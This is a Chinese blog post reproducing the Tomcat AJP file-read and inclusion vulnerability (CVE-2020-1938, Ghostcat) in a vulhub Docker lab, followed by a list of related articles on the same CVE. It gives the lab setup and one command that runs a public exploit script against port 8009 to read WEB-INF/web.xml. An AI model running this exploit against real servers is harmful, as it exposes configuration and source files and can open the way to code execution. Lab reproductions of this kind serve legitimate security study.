Tomcat9 AJP 任意文件读取和文件包含漏洞（CVE-2020-1938）

最新推荐文章于 2025-10-25 01:34:21 发布

原创最新推荐文章于 2025-10-25 01:34:21 发布 · 5.3k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #web安全

漏洞复现专栏收录该内容

22 篇文章

订阅专栏

Tomcat9 AJP 任意文件读取和文件包含漏洞（CVE-2020-1938）

文章目录

1 在线漏洞解读:

https://vulhub.org/#/environments/tomcat/CVE-2020-1938/

在这里插入图片描述

2 环境搭建

cd /home/kali/vulhub/tomcat/CVE-2020-1938

在这里插入图片描述

2.1 修改端口8089

在这里插入图片描述

2.2 环境启动：

sudo docker-compose up -d

sudo docker ps -a

已启动：访问端口8089

在这里插入图片描述

3 漏洞复现

访问http://192.168.225.166:8089/看到Tomcat示例页面，其中还有一个AJP端口8009正在监听

在这里插入图片描述

需要使用到工具访问AJP协议

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

┌──(kali💋kali)-[~/tools/apache-tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi]
└─$ python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.225.166 -p 8009 -f WEB-INF/web.xml

成功查看到文件
在这里插入图片描述

此漏洞有局限性只能读取tomcat/webapps/ROOT/目录下的文件，不存在目录穿越问题…/…/…/…/…/etc/passwd
在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

煜磊

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

13-3 tomcat AJP文件包含漏洞（CVE-2020-1938）

weixin_43263566的博客

12-02

1431

CVE-2020-1938 是一个影响 Tomcat 的 AJP文件包含漏洞。攻击者可以利用该漏洞通过 Tomcat AJP Connector 读取或包含 Tomcat 上所有 webapp 目录下的任意文件，例如配置文件或源码。如果目标应用有文件上传功能，攻击者还可以利用文件包含漏洞实现远程代码执行，造成严重的安全风险。这一漏洞的发现者为长亭科技安全研究员。由于 Tomcat AJP 协议设计上的缺陷，该漏洞存在于 Tomcat 中。影响范围ApacheTomcat 6Apache。

Tomcat-Ajp协议任意文件读取漏洞复现（CVE-2020-1938）

1匹黑马

02-22

6910

文章目录影响版本危害漏洞原理漏洞复现修复建议影响版本 Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0.100 Apache Tomcat 6.x 危害 文件包含 命令执行漏洞原理 Apache Tomcat服务器通过Connector连接器组件与客户程序建立连接，被...

参与评论您还未登录，请先登录后发表或查看评论

Apache Tomcat文件包含漏洞复现(详细教程)

最新发布

2509_92430467的博客

10-25

768

Tomcat是Apache开源组织开发的用于处理HTTP服务的项目，两者都是免费的，都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞，攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件，如：webapp 配置文件或源代码等。Apache Tomcat服务器通过Connector连接器组件与客户程序建立连接，Connector表示接收请求并返回响应的端点。即Connector组件负责接收客户的请求，以及把Tomcat服务器的响应结果发送给客户。

Tomcat 爆出高危漏洞！可导致网站、数据泄露！附解决方案

求关注

02-25

5545

漏洞背景安全公告编号：CNTA-2020-0004 2020年02月20日， 360CERT 监测发现国家信息安全漏洞共享平台(CNVD) 收录了 CNVD-2020-10487 Apache Tomcat文件包含漏洞 CNVD-2020-10487/CVE-2020-1938是文件包含漏洞，攻击者可利用该高危漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件，如：we...

Aapache Tomcat AJP 文件包含漏洞（CVE-2020-1938）

weixin_45653478的博客

05-10

1375

CVE-2020-1938 是 Apache Tomcat 中的一个严重安全漏洞，该漏洞涉及到 Tomcat 的 AJP（Apache JServ Protocol）连接器。由于 AJP 协议在处理请求时存在缺陷，攻击者可以利用此漏洞读取服务器上的任意文件，甚至可能进一步实现远程代码执行。

【Tomcat 文件读取/文件包含(CVE-2020-1938)漏洞复现】

一纸荒芜的博客

04-12

2378

CVE-2020-1938漏洞复现

tomcat9漏洞CVE-2024-23672

mzh10588的博客

07-10

6615

Apache Tomcat 输入验证错误漏洞(CVE-2024-24549)Apache Tomcat 11.0.0-M1到11.0.0-M16、‌。Apache Tomcat 安全漏洞(CVE-2024-23672)漏洞名称：CVE-2024-23672。8.5.0到8.5.98等受影响的版本。10.1.0-M1到10.1.18。9.0.0-M1到9.0.85。

Tomcat AJP 文件包含漏洞（CVE-2020-1938）

m0_61506558的博客

11-20

8794

1．漏洞简介1．漏洞简介2020年2月20日，公开CNVD 的漏洞公告中发现 Apache Tomcat文件包含漏洞（CVE-2020-1938）。是Apache开源组织开发的用于处理HTTP服务的项目。Apache Tomcat 服务器中被发现存在文件包含漏洞，攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件。该漏洞是一个单独的文件包含漏洞，依赖于Tomcat的AJP（定向包协议）。AJP自身存在一定缺陷，导致存在可控参数。

Tomcat 漏洞——AJP文件包含漏洞（CVE-2020-1938）

weixin_57379923的博客

08-08

543

CVE-2020-1938 漏洞是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞。Tomcat 服务器作一个免费的开放源代码的Web 应用服务器，其安装后会默认开启ajp连接器，方便与其他web服务器通过ajp协议进行交互。

CVE-2020-1938：Apache Tomcat-AJP任意文件读取漏洞复现

霸唱轻柔

02-22

3085

前言：Tomcat-AJP Tomcat是Apache 软件基金会（Apache Software Foundation）的Jakarta 项目中的一个核心项目，由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持，最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现，Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因...

【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程（特详细）

热门推荐

m0_67844671的博客

09-12

2万+

Tomcat CVE-2020-1938 漏洞复现和利用过程（特详细）；Apache Tomcat文件包含漏洞（CNVD-2020-10487/CVE-2020-1938）。该漏洞是由于Tomcat AJP协议存在缺陷而导致，攻击者利用该漏洞可通过构造特定参数，读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能，攻击者可进一步实现远程代码执行。AJP（Apache JServ Protocol）是定向包协议。因为性能原因，使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接

Tomcat 文件读取/文件包含漏洞复现（CVE-2020-1938）

oiadkt的博客

04-12

1988

Tomcat 文件读取/文件包含漏洞复现（CVE-2020-1938）

Tomcat AJP 文件包含漏洞（CVE-2020-1938）修复方案及其思考

weixin_53883156的博客

03-22

1833

Tomcat 配置了两个 Connector，它们分别是 HTTP 和 AJP ：HTTP 默认端口为 8080，处理 http 请求，而 AJP 默认端口 8009，用于处理 AJP 协议的请求，而 AJP 比 http 更加优化，多用于反向、集群等，漏洞由于 Tomcat AJP 协议存在缺陷而导致，攻击者利用该漏洞可通过构造特定参数，读取服务器 webapp 下的任意文件以及可以包含任意文件，如果有某上传点，上传图片马等等，即可以获取 shell。

Tomcat Ajp文件读取漏洞复现（CVE-2020-1938）

drhrht的博客

04-10

1658

漏洞简介由于Tomcat默认开启的AJP服务（8009端口）存在一处文件包含缺陷，攻击者可构造恶意的请求包进行文件包含操作，进而读取受影响Tomcat服务器上的Web目录文件。 https://cve.mitre.org/cgi-bin/cvename.cginame=2020-1938 影响范围 Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 环境搭建

Tomcat 幽灵猫任意文件读取漏洞(CVE-2020-1938)

Li-D的博客

09-16

3756

漏洞描述 Tomcat服务器是一个免费的开放源代码的Web应用服务器，属于轻量级应用服务器。Tomcat默认开启的AJP服务（8009端口）存在一处文件包含缺陷，攻击者可构造恶意的请求包进行文件包含操作，进而读取受影响Tomcat服务器上的Web目录文件。漏洞影响版本 Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 漏洞危害攻击者可利用该漏洞进行任意文

Tomcat- AJP协议文件读取/命令执行漏洞（CVE-2020-1938 / CNVD-2020-10487）

好好睡觉

02-17

5524

tomcat漏洞、幽灵猫漏洞、apache反向代理tomcat

CVE-2020-1938源码分析与漏洞复现(Tomcat 文件包含/读取)

spinage的博客

06-12

2476

漏洞摘要 CVE-2020-1938（Ghostcat）是Apache Tomcat AJP协议中的一个高危漏洞，影响Tomcat 6.x至9.x版本。该漏洞源于AJP协议处理器未对请求路径进行安全校验，攻击者可通过构造恶意AJP请求读取Web目录任意文件（包括WEB-INF下的敏感文件），结合文件上传功能可实现远程代码执行（RCE）。漏洞利用需满足AJP服务开启且端口可访问的条件，CVSS评分为9.8。修复方案为升级至Tomcat 7.0.100、8.5.52或9.0.31及以上版本。利用过程可通过工具实

Apache-Tomcat-Ajp文件读取漏洞(CVE-2020-1938、CNVD-2020-10487)

李同學的安全圈

12-03

4568

0x01 漏洞概述 2020年1月6日，国家信息安全漏洞共享平台（CNVD）发布了Apache Tomcat文件包含漏洞（CNVD-2020-10487，对应CVE-2020-1938）。该漏洞是由于Tomcat AJP协议存在缺陷而导致，攻击者利用该漏洞可通过构造特定参数，读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能，攻击者可进一步实现远程代码执行。利用方式属于文件包含漏洞。由于Tomcat默认开启的AJP服务（8009端口）存在一处文件包含缺陷，攻击者可构造恶意的请求包进行

根据Apache Tomcat文件包含漏洞(CVE-2020-1938)漏洞解决

09-02

针对您查询的Apache Tomcat文件包含漏洞（CVE-2020-1938），我将逐步解释漏洞背景、受影响版本和详细的解决办法。这个漏洞是由于Tomcat的AJP（Apache JServ Protocol）协议存在缺陷，导致攻击者可以通过构造特定参数...